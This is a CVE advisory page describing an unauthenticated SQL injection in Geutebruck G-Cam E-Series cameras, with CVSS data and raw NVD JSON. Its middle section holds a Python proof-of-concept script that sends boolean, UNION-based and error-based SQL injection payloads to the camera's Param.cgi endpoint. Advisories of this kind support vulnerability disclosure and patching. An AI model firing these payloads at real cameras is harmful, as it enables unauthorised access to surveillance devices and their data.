Security Vulnerability Report
中文
CVE-2025-12463 CVSS 9.8 CRITICAL

CVE-2025-12463

Published: 2025-11-03 17:15:33
Last Modified: 2026-04-15 00:35:42

Description

An unauthenticated SQL Injection was discovered within the Geutebruck G-Cam E-Series Cameras through the `Group` parameter in the `/uapi-cgi/viewer/Param.cgi` script. This has been confirmed on the EFD-2130 camera running firmware version 1.12.0.19.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Geutebruck G-Cam EFD-2130 < 1.12.0.19
Geutebruck G-Cam E-Series (all versions prior to patch)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12463 PoC - Geutebruck G-Cam E-Series SQL Injection # Target: /uapi-cgi/viewer/Param.cgi # Parameter: Group target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target:80" endpoint = "/uapi-cgi/viewer/Param.cgi" # Basic injection test - boolean based payload_blind = "test' OR '1'='1" payload_union = "test' UNION SELECT NULL,NULL,NULL,NULL,version(),user(),database()-- -" payload_error = "test' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 0 END)-- -" def test_blind_injection(url): """Test for blind SQL injection""" params = {"Group": payload_blind} try: r = requests.get(url + endpoint, params=params, timeout=10) return r.status_code == 200 except: return False def test_union_injection(url): """Test for UNION-based SQL injection""" params = {"Group": payload_union} try: r = requests.get(url + endpoint, params=params, timeout=10) return "version()" in r.text or "root@" in r.text except: return False if __name__ == "__main__": print(f"[*] Testing CVE-2025-12463 on {target_url}") if test_blind_injection(target_url): print("[+] Blind SQL injection confirmed!") if test_union_injection(target_url): print("[+] UNION SQL injection confirmed!")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12463", "sourceIdentifier": "[email protected]", "published": "2025-11-03T17:15:32.847", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated SQL Injection was discovered within the Geutebruck G-Cam E-Series Cameras through the `Group` parameter in the `/uapi-cgi/viewer/Param.cgi` script. This has been confirmed on the EFD-2130 camera running firmware version 1.12.0.19."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://blog.blacklanternsecurity.com/p/cve-2025-12463-98-unauthenticated", "source": "[email protected]"}]}}